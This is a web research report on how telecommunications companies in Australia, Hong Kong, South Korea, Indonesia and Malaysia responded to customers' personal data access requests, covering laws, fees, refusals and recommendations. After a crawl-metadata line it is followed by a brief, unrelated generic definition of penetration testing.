|TPG||Dec 12 2015||Mar 7 2016 reply seeking clarification on request. Volunteer didn’t follow up.|
|Amaysim||Dec 12 2015 (First Request)
Dec 12 2015 (Second Request)
|Feb 24 2016 replied with data
Feb 24 2016 replied with data
|Jeenee||Mar 15 2016||No response|
The study indicates that a number of Australian telecommunications entities struggle to adhere to their lawful requirements under the Privacy Act and APPs. Numerous requests went unheeded and, for those that did respond, it seemed clear that internal procedures were lacking. Without such procedures, improper advice was offered by company staff which, in and of itself, established additional barriers to requesters accessing their personal information. Companies that repeatedly did not respond were not included in the table below (the exception being Optus who did not respond on two occasions, but did so on a third). For companies that did respond, there was variation in fees that were charged. Telstra and Vodafone (both infrastructure operators) charged significant fees that amounted to hundreds of dollars. Optus did not respond with any customer data, while Amaysim (an infrastructure ‘reseller’) did not charge any fees whatsoever when providing data. The table below elaborates on notable aspects of the results. Vodafone issued a letter stating that the sharing of any personal information disclosed to the requester would violate the standard form contract agreement that was agreed upon between the company and its customer.
|Company||Fee requested? For what?||Tell requester if data shared with law enforcement?||Notes|
|Telstra||Online portal was used to request information at varying prices. Total fee in study was 225 AUD for as comprehensive information as was available (see Appendix 1 below).||Yes||Information was disclosed via encrypted zip file (password sent plain-text in separate email).|
|Optus||No fee requested, information requesting subpoena be attained to facilitate request||Yes||Generally responded to most questions when in conversation. No information provided apart from improper advice citing subpoena requirement and then no response when asked to clarify whether this information was correct.|
|Vodafone||Fees provided in hourly rates (60-80 per hour) but no information provided on how many hours would be involved for retrieval||Yes||Generally responded to most questions. Retention periods disclosed in letter far exceed the mandatory data retention requirements under the Telecommunications Interception and Access Act (1979) of 2 years. Letter further cited that standard form contract stipulated that no information from the letter could be disclosed, and to do so would be a breach of the standard form contractual agreement.|
|Amaysim||No fee requested.||Yes||Provided quick and fulsome reply of data that is visible to their network as a reseller.|
Table 1. Australian Data
While the Australian Privacy Act and APPs provide a clear framework for consumers to understand what information is collected, retained, and processed by TSPs and ISPs, it can be challenging for individuals to exercise their rights. DARs were unevenly responded to by TSPs and ISPS, leading to uneven outcomes that posed significant barriers to access. Furthermore, the costs companies demanded before processing some requests were either prohibitive for everyday consumers or were not clearly communicated.
Four main recommendations can be drawn from the Australian case:
- Companies should review their data access processes, and assess where improvements could be made to reduce cost, reduce or make more user-friendly their identity verification steps, and streamline security procedures. These reviews should culminate in clear training to front-line customer staff to familiarise them with how to facilitate DARs.
- Companies should publish data inventories describing all the kinds of personal information that they collect and freely provide copies of a small set of representative examples of records for each kind of personal information to subscribers upon request.
- Further clarity be given regarding the legality of non-disclosure agreements in standard form private contracts as they relate to statutory legal frameworks.
- Companies should collaborate within their respective industries to establish common definitions for personal data to which common policies are applied, such as subscriber data, metadata, content of communications, etc. Such policies should be developed and implemented by operators as well as resellers of TSP and ISP services in the Australian market.
Lokman Tsui (Chinese University of Hong Kong)
- Telecommunication companies and Internet providers in Hong Kong argue that IP addresses and geolocation records are not personal data and therefore they are not required to give users access to this data.
- The only data users got back were call records and account information.
- The companies also did not tell users whether their data had been shared with third parties such as law enforcement agencies.
Adopted in 1996 by the Hong Kong government, the Personal Data Privacy Ordinance (PDPO) is the first major personal data protection framework in the Asia-Pacific region. A key provision of the PDPO is the “data access” principle, which allows residents to ask data controllers for information held about them, and to correct it if it is inaccurate.
|Legal justification||Data Protection Principle 6 of the Personal Data Privacy Ordinance is the Data Access and Correction Principle|
|Phrasing||“A data subject must be given access to his/her personal data and allowed to make corrections if it is inaccurate.”|
|Response deadline||Within 40 calendar days after receiving the request|
|Fee for access||A telecommunications company may impose a fee for complying with a DAR which should not be excessive. It should clearly
inform the requestor what fee, if any, will be charged as soon as possible and in any event not later than 40 days after receiving the DAR.
|Remedies if unsatisfied with response?||An individual may file with the Privacy Commissioner for Personal Data a written complaint against an organization|
The seven major telecommunication companies and Internet providers in Hong Kong are SmarTone, Three, Hong Kong Telecom, Hong Kong Broadband, i-Cable, China Unicom, and China Mobile. Most have local ownership (Hong Kong Telecom, Hong Kong Broadband, i-Cable, SmarTone, Three) while two are owned by Mainland Chinese State Owned Enterprises (China Mobile, China Unicom).
Access My Info: Hong Kong
The data collection ran from January to August 2016.
We recruited ten volunteers who individually sent requests to the seven major telcos. We made sure each telco was sent data access requests from at least two different individuals
|Company||Request Date||First Response Date|
|SmarTone||January 12, 2016||February 5, 2016 (letter)|
|Three||January 24, 2016||January 25, 2016 (phone)|
|Hong Kong Telecom||January 18, 2016||January 22, 2016 (phone)|
|Hong Kong Broadband||January 18, 2016||January 25, 2016 (phone)|
|i-Cable||January 21, 2016||not recorded|
|China Unicom||February 17, 2016||March 1, 2016 (letter)|
|China Mobile||January 14, 2016||January 22, 2016 (phone)|
All Hong Kong telecommunications companies responded to requests for access to personal data within the mandated 40 day period. Only two responses were in writing, with the rest occurring over a phone call (despite the law mandating a response in writing). In their response, the companies often answered only a few of the questions and ignored the rest.
Several companies refused to answer the question of whether data had been shared with third parties, while some other companies over the phone answered that they would never share data with third parties, but would refuse to confirm this in writing. None answered the question whether they actually had shared data.
|Company||Fee requested? For what?||Tell requester if data shared with law enforcement?||Notes|
|SmarTone||–||No||Only sent call records. Responded with “N/A” to requests for other types of data including IP and geolocation.|
|Three||HK$200 for handling fee. HK$35 per month for bill statement/detailed call records. HK$80 for contract copy.||No||No response to requests for other types of data including IP addresses and geolocation.|
|Hong Kong Telecom||HK$250 for processing fee||No||Charged HK$250 for processing fee and explicitly states that it is not refundable notwithstanding if there is no data returned. Also requires users to submit another form before proceeding with DAR.|
|Hong Kong Broadband||HK$100 for copy of subscriber information||No||Over phone mentioned they cannot provide anything.|
|i-Cable||–||No||Over phone mentioned they cannot provide anything.|
|China Unicom||–||No||Letter mentions that user can get call records and account information online. Letter also argues that they are unable to provide other types of data, including IP addresses and geolocation.|
|China Mobile||HK$10 per month for bill statement. HK$30 for call records. HK$100 for copy of contract.||No||No response to requests for other types of data including IP addresses and geolocation.|
It would be helpful to have clear guidelines on what is and what is not considered personal data, including potentially sensitive data such as IP addresses associated with your account and geolocation records.
In addition, it would be helpful to have clarity on how companies decide what fee to request for their service. One company requested a fee even when it was unclear whether they could provide any data. Several users mentioned that the cost of the fee was prohibitive and that they would not continue their DAR because of it.
It would also be helpful for the telecommunication companies to provide a sample report, including an overview of the data types they collect, and for how long they keep this data.
Lokman Tsui and Stuart Hargreaves, (2019) “Who Decides What Is Personal Data? Testing the Access Principle with Telecommunication Companies and Internet Providers in Hong Kong” International Journal of Communication
Stuart Hargreaves and Lokman Tsui (2017) “IP Addresses as Personal Data Under Hong Kong’s Privacy Law: An Introduction to the Access My Info HK Project” Journal of Law, Information & Science 25(2),
Kelly Kim (Open Net Korea)
- A significant gap between the law and practice: South Korea has a strong data protection regime in text and theory that guarantees data subjects’ right to access all personal data, but our research found very superficial compliance to data access requests by the telecommunications companies we made requests to. All companies had online data request procedures, but the majority of companies only provided copies of their privacy policies in response to the data access requests. Korea Telecom provided some of the requested account information but did not give a fulsome response.
- Legal action: In response to this lack of compliance, Open Net Korea filed a lawsuit against Korea Telecom. On December 5, 2018, the trial court ruled in favor of Open Net Korea stating that the company must provide incoming call records to customers. Other data such as IP address logs were given during the course of the lawsuit. KT appealed.
- Third-party access to personal information: Since 2015, Korean telecommunications companies have started to tell users whether their data had been shared with investigation agencies. However, when we asked companies if they shared customer data with third parties such as private companies, only Korea Telecom provided responses.
Korea has one of the strongest data protection regimes in the world. However, the effectiveness of the regime has been undermined by the extensive use of Resident Registration Numbers (RRNs) to verify real identities, and reluctance from government authorities and the Courts to investigate and punish companies for data breaches. Undoubtedly, there have been many data breach incidents in Korea largely due to the RRN system and the identity verification system as companies had to collect sensitive personal information including RRNs that increased the risk of a data breach.
Two data protection laws apply to telecommunications services in Korea: the Personal Information Protection Act (PIPA) and the Act on Promotion of Information and Communications Network Utilization and Information Protection (Information and Communications Network Act, ICNA). The PIPA was introduced in 2011 and provides a general data protection framework for both the public and the private sectors. The ICNA was introduced in 1999, much earlier than the PIPA, and applies only to information and communications service providers, which are telecommunications business operators and for-profit online service providers. The ICNA prevails regarding telecommunication companies when the laws are in conflict (see Table 1).
|Legal justification||Article 30(2) of the ICNA (The PIPA applies supplementarily)|
|Phrasing||“Every user may demand a provider of information and communications services or similar to allow him/her to inspect, or to furnish him/her with, any of the following matters about him/her, and may also demand the provider to correct an error, if there is any error: 1. Personal information of the user, which the provider of information and communications services or similar possesses; 2. The current status of personal information of the user, which has been used by the provider of information and communications services or similar or furnished to a third party; and 3. The current status of personal information of the user, for which the user consented to the collection, use, or furnishing of personal information by the provider of information and communications services or similar.”|
|Response deadline||“Without delay”
(c.f. “within 10 days” according to the PIPA)
|Fee for access||There is no mention in the ICNA so the PIPA applies. According to Article 38(3), the data processor “may charge fees and postage (limited to cases where a request is made to send a certified copy by mail).” However, the fee should not exceed the actual cost of accommodating the request, and if the reason for making the request was caused by the data processor, then the data processor should not charge any fees.|
|Remedies if unsatisfied with response?||An individual may file with the Korea Communications Commission (KCC) a complaint against the service provider (data processor), and the KCC has the power to impose a fine of no more than 30 million won (approximately 26,500 USD) for any breach of the provision.|
Table 1: Overview of Article 30(2) of the ICNA
The telecommunications sector in Korea is seemingly diverse and open to competition, with 96 ISPs operating as of May 2019. Nevertheless, the ISP market is dominated by three major companies: SK Telecom (SKT), Korea Telecom (KT), and LG U+. The mobile service market is also dominated by the same companies; each is a privately held and publicly traded company, although KT initially was a state-owned entity.
Investigation agencies have been abusing Article 83(3) of the Telecommunications Business Act (TBA), which allows warrantless access to subscriber information such as names, RRNs, and addresses. Although the ICNA clearly states that data subjects have the right to find out whether and with whom their data was shared, telecommunications companies had refused to tell users about the warrantless access. Open Net Korea and PSPD carried out the “Ask Your Telcos” campaign along with a series of lawsuits, and as a result, telecoms started to tell users whether their data had been shared with investigation agencies since 2015.
Access My Info: South Korea
The objective of Access My Info (AMI) South Korea is to investigate the kinds of information that are collected and retained by three major telecommunications companies—SKT, KT, and LGU+—as well as the effectiveness of the legally guaranteed inspection right or right to information.
The AMI South Korea pilot study was conducted in two phases. The first phase was to find out whether the telecommunications companies have procedures for the inspection requests under the ICNA (Data Access Requests, DARs). The second phase was to find out whether the Access My Info project launched in Canada would be feasible in South Korea.
Phase 1 (January – February 2016)
On January 18, 2016, Open Net Korea published an announcement on its website to recruit volunteers. Initially, 10 volunteers were recruited per company. Those volunteers were asked to make phone calls or visit stores or customer service centers to figure out ways to make DARs for the three types of information prescribed by Article 30(2) of the ICNA between 26-29 January 2016.
Phase 1 research showed that all three telecoms (SKT, KT, LGU+) had online request systems in place. Users could make a DAR by logging-in to companies’ websites and verifying their identity with the identity verification services provided by verification agencies. Volunteers were asked to make the online request, but not all of them completed the process. In the end, 3 responses for SKT, 3 responses for KT, and 2 responses for LGU+ were received. The online responses of each company were identical so no further volunteers were recruited.
For SKT and LGU+, the online response to a DAR was generated instantly because it was just a copy of their privacy policies, whereas KT took one day to respond and provided more information than the other companies.
Phase 2 (August -September 2016)
The objective of Phase 2 was to test whether the AMI approach—drafting and sending DAR letters to telecoms—would produce different results than using the online request systems tested in phase 1. Open Net Korea drafted a DAR letter for each of three companies (SKT, KT, and LGU+) and published a new recruit announcement on 11 August 2016. This time, the requests were to be made in two steps: first by making a DAR using the online process and then by sending a formal AMI letter to each company’s privacy officer via email. Volunteers were requested to provide Open Net with all of the companies’ responses. In the end, 5 volunteers returned their responses (4 responses for SKT and 1 response for LGU+). Companies provided apparently automated email responses that instructed users to use the online request system or visit the offline customer service centers for more information. Phase 2 stopped here because it was clear that the result would be the same as Phase 1.
|Company||Fee requested? For what?||Data Provided||Notes|
|KT||No||1) Table showing whether or not KT retains 12 types of personal information (name, RRN, address, phone number, email, ID, Bank account no., etc.)
2) details of data sharing with third parties (except investigation agencies and the court)
3) details of the user’s consents given to data collection
|KT had the best practice among three telecoms especially regarding 2) and 3). However, it provided a very limited data set when a data subject has a legal right to access all personal data.|
Table 3: Summary Analysis of DAR responses from three telecoms in South Korea, 2016
Korea Telecom Lawsuit
KT appealed the decision and the case is currently pending at the appeals court. Open Net aims to get a decision clearly stating that all data of a customer collected by a telecommunications company are personal information under the ICNA and that customers should be given full access to the personal information.
For all three telecommunications companies:
- Telecoms should provide full access to a customer’s personal information they collect when issued with a DAR.
- KT has the best practice among three telecommunications companies, especially regarding the disclosure about information sharing with private third parties. However, KT could improve its DAR procedure by allowing a customer to make one request for all personal information.
For SKT and LGU+:
- Not providing any information in response to a DAR is clearly in violation of the ICNA. SKT and LGU+ should develop a DAR procedure that produces a meaningful disclosure, i.e. full access to all personal information of a customer.
For the data protection authorities, especially the KCC:
- Authorities should make clear and detailed DAR guidelines for customers and companies. In September 2018, the KCC published the revised “Online Personal Information Processing Guidelines” that provides detailed instructions and examples on how companies, especially telecommunication service providers, should process and respond to DARs. It is a result of Open Net’s AMI campaign and advocacy. However, the telecoms haven’t improved their practice according to the guidelines until now. The KCC should strongly enforce the guidelines so that it is duly complied.
OpenNet Korea, “Ask Your Telcos Campaign Report”
Sinta Dewi Rosadi (University of Padjadjaran)
- Lack of data protection law: Indonesia only has the Ministry of Communications and Informatics Regulation on Personal Data Protection in Electronic System. This regulation is insufficient, as it does not impose strong obligations on telecommunications companies to protect user data and only establishes administrative (as opposed to Criminal) penalties. As a result, the public does not use their right to access. The Ministry of Communication and Informatics (MOCI) has drafted a New Data Protection Law and in 2019 submitted the draft bill to the Parliament as a prioritized law for Parliament’s deliberation.
- Similar responses from telecommunication companies: None of the telecommunication companies provided user data in response to the Data Access Requests. However, the companies did respond to the majority of questions asked about their data practices and stated that they never disclose any consumer personal data information to third parties.
The protection of personal data in Indonesia was not the main political agenda until 2008. Prior to this time the government placed greater focus on developing telecommunication infrastructure and emphasized the need to address “negative content” on the Internet, such as pornographic material, online hate speech, and “fake news.”
In 2008, Indonesia established the Electronic Information and Transactions Law which stipulated personal data protection. This general regulation was supplemented in 2010 in line with increasing number of Internet and social media users, and growing e-commerce adoption. Specifically, the government of Indonesia vis-a-vis the Ministry of Communications and Informatics passed several implementing regulations to protect personal data amidst the growing trend of big data collection and analysis. The need for a personal data protection law in Indonesia is increasing because the desire by public and private organizations to intensively collect data, about wide swathes of people to advance their objectives.
In 2016, the Ministry of Communications and Informatics issued Regulation No 20 of 2016 on Personal Data Protection in Electronic System as an implementing regulation of the Electronic Information and Transactions Law. The new Regulation was motivated largely by non-consensual and bulk collection of personal data by businesses and government entities following the launch of the national Electronic Identity Card.
The regulation stipulates several principles pertaining to the processing of personal data:
- Personal data as a privacy right;
- Confidentiality of personal data, save for the consent given or as allowed by law;
- Consent as basis;
- Relevance with the purpose of procurement, collection, processing, analysis, storage, display, publication, transmission, and dissemination;
- Reliability of electronic system in which data is processed;
- Good-faith written notification of breach of personal data protection to the data owner;
- Provision of internal rules on the governance of personal data protection;
- Responsibility on personal data which is in control of the user;
- Access and correction to personal data by data owner; and
- Integrity, accuracy, lawfulness and newness of personal data.
Four telecommunication companies (Telkom, Telkomsel, Indosat Ooredoo, XL-Axiata) control an 85% market share in Indonesia’s mobile phone market. Although the country has a population of 260 million about 300 million mobile phones are in use in Indonesia, implying that some people use two or more mobile phones. PT Telkom, of which Telkomsel is a subsidiary, is the incumbent with over 174 million subscribers. Indosat Ooredoo is the second largest company with 63 million cellular subscribers that offers prepaid and postpaid services also as incumbent for providing international services. XL-Axiata is a new player and become the first mobile services operator that offers mobile communications.
Access My Info: Indonesia
Four volunteers were recruited to send requests to the major telecommunications companies in Indonesia: Telkom, Telkomsel, Indosat Ooredoo, XL-Axiata. All telecommunications companies in Indonesia responded to requests for access to personal data within 14 days (See Table 1).
|Company||Request Date||First Response Date|
Table 1: Response times for data access requests to each telecommunication company.
None of the companies provided customer data in response to the DAR. However, the companies did generally answer the questions made in the DAR. Table 2 provides an overview of company responses.
|Company||Are data operators required by law to respond to requests for access to personal data?||Company responses for the questions||Notes|
|Telkomsel||According to Ministerial Regulation No.20/2016, data subject have an access right to their personal data (historical access)||
Indosat Ooredoo may share non-personally-identifiable information (such as anonymous User usage data, referring / exit pages and URLs, platform types, asset views, number of clicks, etc.) with interested third-parties to assist Indosat Ooredoo in understanding more about user behavior on Indosat Ooredoo Service.
Table 2: Summary of responses to data access requests from each telecommunication company.
The government of Indonesia is committed to supporting the development of information technology through law and regulation for the growth of e-commerce, the development and utilisation of information technology, and to provide for laws to protect the right to privacy. However, personal data protection in Indonesia is largely a patchwork approach; the 2016 regulation is only a Ministerial Regulation which does not impose strong obligations on telecommunications operators and only establish administrative (as opposed to Criminal) penalties.
Data access requests will not assume the force of legal obligations on telecommunication companies unless Indonesia establishes a specific Personal Data Protection Law. In responding to the requests, the Indonesian Telecom Operators always stated the Telecom Law, and not the Ministry of Communications and Informatics’ Ministerial Regulations on Data Protection, which reveals what rules and requirements the companies have established as most important to comply with.
Sonny Zulhuda (International Islamic University of Malaysia)
- Lack of Legal Readiness: Telecommunication companies in Malaysia were not yet ready to fully respond to data access requests, which shows that the rules of the Personal Data Protection Act have not yet been fully implemented.
- Inconsistent Practices: Telecommunication companies did not follow a standard method for responding to data access requests. Their practices followed respective company policies rather than legal or regulatory requirements.
- Incomplete Data: Providers were generally willing to disclose basic personal data and service bills to data subjects, i.e., customers, but did not share other types of personal information including call records, texts received or sent, nor details about their practice of collection and processing of personal data.
In June 2010, Malaysia introduced the Personal Data Protection Act 2010 (Act 709) (“PDPA” or “the Act”), with the objective of regulating the processing of personal data in commercial transactions. The Act applies to any person in either of two conditions. First, a person who processes personal data in respect of commercial transaction. Secondly, it applies to any person who has control over, or authorises the processing of any personal data (PDPA section 2(1) ) . The person who processes such data is called a “data user” while the individual whose data is processed is a “data subject.” The Act however does not apply to the Federal Government and State Governments (PDPA, section 3(1) ); this failure to comprehensively apply the Act constitutes a major impediment to protecting individuals’ personal information. Furthermore, the Act is inapplicable to personal data processed outside Malaysia unless that personal data is intended to be further processed in Malaysia (PDPA, section 3(2) ).
Under the Access Principle in section 12 of the PDPA, a data subject shall be given access to their personal data held by a data user and be able to correct that personal data where the personal data is inaccurate, incomplete, misleading, or not up-to-date. This right to access and to make corrections may however be waived if compliance with a request to such access or correction is refused under circumstances provided by the Act. The law compels a data user to respond in the prescribed period by either complying with the request (i.e., by providing the data subject with data requested) or by notifying the refusal in writing (upon prescribed reasons only). This principle has set up a new standard of transparency and accountability for those who are involved in the processing of personal data. Furthermore, according to the subsidiary rule under the Act, upon receiving the data access request, the data user must acknowledge the receipt of such request (Personal Data Protection (PDP) Regulations 2013, regulation 9.) However, the law is silent on how the communications should take place.
It is not entirely clear what kinds of information a data subject can request to access from the data user. Is a data subject entitled to ask questions about how a company handles their data? Though there is no specific provision on the right to ask questions about how a company handles personal data, the words of the law are broad enough to cover such questions. The PDPA, under its Notice and Choice Principle, provides that a data user shall provide a written notice to inform a data subject, among others, of the data subject’s right to request access to and to request correction of the personal data and how to contact the data user with any inquiries or complaints in “respect of the personal data” ( PDPA, section 7(1)(d) ). The last-mentioned phrases would arguably include right of a data subject to ask, for example, whether or not their personal data had been disclosed to any party.
It follows that informing a data subject about the third parties to whom personal data was, or is to be, disclosed is made compulsory from the beginning of the data process. According to the Notice and Choice Principle, a data user shall by written notice inform a data subject, among others, of the class of third parties to whom the data user discloses or may disclose the personal data (PDPA, section 7(1)(e) ). Note, however, that the requirement is only to notify the class of third parties which, absent a definition, means a group of parties belonging to certain classification and not the specific companies or organization which may be receiving the information. Nevertheless, the data subject may arguably be able to force a data user to name any individuals to whom the data has been disclosed by virtue of the other part of the statutory provision (PDPA, section 7(1)(d) ). However, if the personal data is to be disclosed to any party other than the class of third parties mentioned above, such disclosure must be made with the consent of the data subject (PDPA, section 8(b) ). By virtue of the PDP Regulation 2013, a data user must keep and maintain a list of disclosures to third parties that pertain to the personal data of the data subject that has been or is being processed by them (PDP Regulations 2013, regulation 5).
A data subject who makes a data access request (DAR) is arguably entitled to know about
how the data user handles data processing including any disclosure of data to a third party. In describing a data subject’s rights, the PDPA establishes that an individual is entitled to be informed by a data user whether personal data of which that individual is the data subject is being processed by or on behalf of the data user (PDPA, section 30(1) ). Since data “processing” is defined in section 4 of the PDPA to include “the disclosure of personal data by transmission, transfer, dissemination or otherwise making available,” it follows that an individual or data subject is entitled to be informed by a data user whether personal data is being disclosed or made available by the data user.
The PDPA establishes that, first, a data subject may have to pay a prescribed fee to the data user to initiate a data access request (DAR). Having paid the fee, the data subject may make a written data access request to the data user for information of the data subject’s personal data that is being processed by or on behalf of the data user. Furthermore, the data user is obliged to communicate a copy of the information to the data user in an intelligible form (PDPA, section 30(2) ). This communication of a copy of the data in an intelligible form is required by default, in so long there is no indication to the contrary (PDPA, section 30(3) ). While the Act is silent about the meaning of “intelligible form” it ought to be interpreted close to its natural meaning, which is in an easily and humanly readable format. The purpose of this clause is to ensure the data subject can generally understand the information without unnecessary difficulty and provide it in a language which is readily understandable by the general public. In Malaysia, that language would be either English or the national language of Bahasa Malaysia.
The data subject must authenticate themselves to the data user when preparing and issuing the DAR; such authentication must be completed before the data user can proceed with the request. While this requirement is implicitly established in the Act, insofar as the Act authorizes a data user to potentially refuse to comply with a data access request under section 30 if (a) the data user is not supplied with such information as he may reasonably require in order to satisfy himself as to the identity of the requestor (PDPA, section 32(1) ). For the purposes of identifying the requestor, such identification information means name, identification card number, address and such other related information as the Commissioner may determine (PDP Regulations 2013, regulation 5).
The actual means of communicating with a data subject is largely left undefined. According to Reg. 9(2) of the PDP Regulations 2013, upon receiving the data access request pursuant to subsection 30(2) of the Act, the data user shall acknowledge the receipt of such request. There is however no further guidelines as to how such acknowledgement should be made. Furthermore, when a data user complies with the DAR the information must be provided in such an “intelligible form” but the actual presentation of data may be either a copy of the data or “access without copy.” There is no other requirements in relation to the format of the response (PDPA, section 30(2) ). Per section 30(3) of the PDPA, the data user may provide the data as requested in some other form or formatting, including machine-readable format, when there is an indication to that effect from the data subject.
The Act also establishes that a fee may be prescribed by a data user. The fee was fixed to a maximum rate in the Personal Data Protection (Fees) Regulations 2013, as follows:
- For a request of personal data with a copy: MYR 10.00
- For a request without a copy: MYR 2.00
- For a request of sensitive personal data with a copy: MYR 30.00
- For a request of sensitive personal data without a copy: MYR 5.00
PDPA section 3 defines “sensitive personal data” as any personal data consisting of information as to the physical or mental health or condition of a data subject, their political opinions, their religious beliefs or other beliefs of a similar nature, the commission or alleged commission by them of any offence or any other personal data as the Minister may determine by order published in the Gazette.
Upon receiving a data access request, the data user has to respond within the prescribed time limit under the Act, which is a maximum period of 21 days from the date of receipt of the data access request (PDPA, section 31(1) ). The data user may extend such timeline provided that they must give reason(s) for such an extension. Thus the Act provides that a data user who cannot comply with a data access request within the 21-day period shall before the expiration of that period provide a written notice to inform the requestor that they are unable to comply with the data access request within such period and the reasons why they are unable to do so (PDPA, section 31(2) ). Upon fulfilling this requirement, the data user can extend their response time to a maximum of 14 days after the expiration of the original period stipulated before (PDPA, section 31(3) ). So, in total, their maximum response time is 35 days.
There are grounds on which a data user may refuse to comply with data access request. One reason is when the requestor fails to identify themselves. Second, a user may refuse a DAR if they are not supplied with information that is needed to locate the personal data requested in the DAR. Third, they may refuse the request when the burden or expense of providing access is disproportionate to the risks to the data subject’s privacy in relation to the personal data in the case in question. Fourth, a data user may also refuse a DAR if they cannot comply with the request without disclosing personal data relating to another individual who can be identified from that information unless they have consented or it would be reasonable to assume such consent. The same provision provides a few more situations where refusal may take place based on necessity or harm prevention. Similarly, data user may also refuse an access request if providing access would constitute a violation of an order of a court, disclose confidential commercial information; or it is otherwise regulated by another law (PDPA, section 32(1)(b)-(h) ). In any case where a data user refuses a DAR they must inform the requestor of their refusal by notice in writing within twenty-one days from the date of receipt of the data access request (PDPA, section 33).
The data subject can contest a refusal by way of forwarding a complaint to the PDP Commissioner. This right is in line with the general entitlement of the data subject to complain if they experience difficulties in obtaining access to their personal data, arguing that it violates their rights. The law allows the data subject to make a complaint to the PDP Commissioner in writing about an act, practice or request, where they must explain the details of such act, practice or request together with the nature of personal data of the data subject, and the potential contravention of the Act (PDPA, section 104).
Access My Info: Malaysia
As of the end of 2018, three main companies serviced 72% of mobile subscribers in Malaysia. Celcom provided service to 20%, Maxis 25% and DiGi 27%. In terms of the mobile telecommunications revenue, Maxis contributed to 34% of subscribers whereas Celcom and DiGi contribute to 27% and 24% respectively (Industry Performance Report 2018, MCMC).
As part of the Access My Info in Malaysia project (”AMI” Project) conducted in 2016, we chose the three biggest telecommunications service providers in Malaysia, namely Celcom Axiata Bhd. (Celcom), Maxis Bhd. (Maxis), and Digi Telecommunications Sdn. Bhd. (DiGi)..
Following the guidelines given in their respective websites, the volunteers first made phone calls to the hotline numbers provided online. All these numbers are general line numbers; none were a special line for PDP-related complaints or requests. The volunteers asked service providers about the basic personal information of customers that are kept with the companies; records of phone conversations and text messages being sent and received; itemized bills; and the company’s policy on data integrity, data security and data disclosure. The request started with a phone call method. At Maxis and Digi, the volunteers were also informed that they should come to the service counters to obtain certain types of personal information. Celcom also advised the volunteer to come to the centre and speak to the staff there personally about their request.
Both Maxis and Digi were willing to disclose and share the basic personal information of the subscribers on the phone. However, when asked about the content of call recordings and text messages, they both could not comply. At Maxis and Digi, requests for call recordings and text details were responded differently by different staff. At first, the volunteers were told that such data cannot be obtained as they are not kept by the providers. During another phone-call, the response was that such data can only be obtained by visiting the customer centre. During visits to the customer centres, the volunteers were told that such information can only be obtained if there was a police report relating to the data requested. This shows that there is no uniform response given by the service providers on the same subject matter or request. For Celcom, interestingly, the volunteer who called was immediately informed to come personally to the service center. So, personal data was not obtained on the phone, but rather by asking for it at the service counter. However, the Celecom customer representative refused to disclose details about messages that had been sent out and received by the volunteer in a certain period of time.
Despite the fact that the volunteers had specific queries about their personal data processing, none of the customer service representatives transferred the communications to a specific data protection officer in the given company, which meant that none of our volunteers spoke to the data protection officer or anyone in charge of personal data protection matters. At Maxis, when a volunteer requested to be connected to any data protection officer, the staff in charge was not willing to contact their data protection office. Instead, the staff member kept speaking to the volunteer to handle the queries on their own. In the case of Celcom, the volunteer who spoke with the company’s staff was immediately told to come personally to the service center on the basis that personal data could not be obtained on the phone and could only be obtained by asking on the counter. Furthermore, when requested, the staff member refused to disclose details about messages that had been sent out and received by the volunteer in a certain period of time. As for DiGi, the volunteer was told to use the existing web-based Online Customer Service (OCS) or otherwise to come to any Digi Centre in the town. As far as basic personal data is concerned, the person on the phone was willing to disclose information to the data subject.
The language of the replies varied between different providers and on different items. All the telecommunications providers were willing to help and to disclose basic personal information to the data subject, either through online platforms or on the counter after first making on-counter request personally. Meanwhile, on the request for itemized bill including record of numbers to whom phone calls were made, the providers required volunteers to come over the service center and make on-the-counter requests. DiGi stated that for the more sensitive data such as records of phone calls and text messages, the request would have to come from a law enforcement agency. None of our volunteers did requests about the collection or processing of subscribers’ location data and IP addresses data.
As the implementation of the PDP Act 2010 is still at its infancy, the outcome of this study is not necessarily surprising. As time passes, it is important to conduct another round of data access requests. Future research should highlight the rights of data subjects and and the obligations of the data users as prescribed under the specific data protection principles in the PDPA 2010. Also, a more precise scope of personal data needs to be requested during future access request studies.
There is another important development that may push the industry towards achieving better compliance with the PDPA. As of the end of 2017 the PDP Commissioner’s Office endorsed the new PDP Code of Practice for Telecommunications Industry. Telecommunications providers in Malaysia are required to comply with the Code. Though the Code does not change the rules of the game as generally prescribed by the PDPA, it will be interesting to see how certain specific rules be introduced to them so as to achieve better compliance with the Act. It is right to argue that now the telecommunications provider will have to be more aware, prepared and operational on the issues of personal data protection in their organizations.
Data Access Request (DAR) is a new right for Malaysian individuals relating to their personal data as processed by data users. Its introduction by the PDPA will eventually change the business process in Malaysia. Industries will need to provide such mechanisms in compliance with the principles of the law.
Telecommunications companies will be among those are greatly affected by DARs. With the rising prosecutions and cases relating to personal data abuses in recent years, data subjects will certainly be more aware about their right to DAR. This awareness will create stronger expectations of transparency from the data users. The provision and mechanism of DAR is the key to that transparency and accountability.
Based on our preliminary study, we found that the DAR handling and processing in Malaysia is still far from ideal. This finding is not surprising at all, considering that PDPA is only recently enforced and many in the industry are still catching up with the new law. Companies should however understand that this lack of compliance cannot be tolerated for a longer time. Soon data subjects will understand that DAR is an inherent right for them and cannot be abandoned.
Below are three steps companies can take to be better prepared with DARs.
- Data users shall review and improve their internal procedures in governing, managing and dealing with data processing, including more specifically about the scope and limitations of data access rights under the Law. All these need to be embedded in their privacy policies. During collection, for example, they need to have a proper procedure to inform data subjects about the data access request (DAR).
- Data users need to appoint a capable officer especially tasked with the DAR. The person or his office must be ready to serve inquiries, complaints and requests by data subjects relating to their personal data. They must be the focal point of communications and action in relation to data processing requests, complaints and the relevant action.
- Telecommunications companies should streamline their business process with the newly endorsed Code of Practice for telecommunications industry and to establish better communications between the players in the industry. This step is important in order to achieve a common standard in telecommunications industry that complies with the requirements of the Personal Data Protection Act 2010. In this respect, the Office of PDP Commissioners should be able to help with practical advice and recommendations. | <urn:uuid:19c02fc8-1423-4e75-aee2-0daac56d6b81> | CC-MAIN-2022-40 | https://citizenlab.ca/2019/10/measuring-data-access-rights-around-the-world/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338280.51/warc/CC-MAIN-20221007210452-20221008000452-00154.warc.gz | en | 0.941593 | 15,247 | 2.734375 | 3 |
What is penetration testing?
Penetration testing is also known as Pentest, is a simulated cyber attack against the computer system, web application or network performed to evaluate the exploitable vulnerabilities in the system. The purpose of simulated attack is to find any weak spots that attackers could gain unauthorized access to the systems feature and data. The pen test can be automated with software applications or performed manually.
What is the purpose of penetration testing?
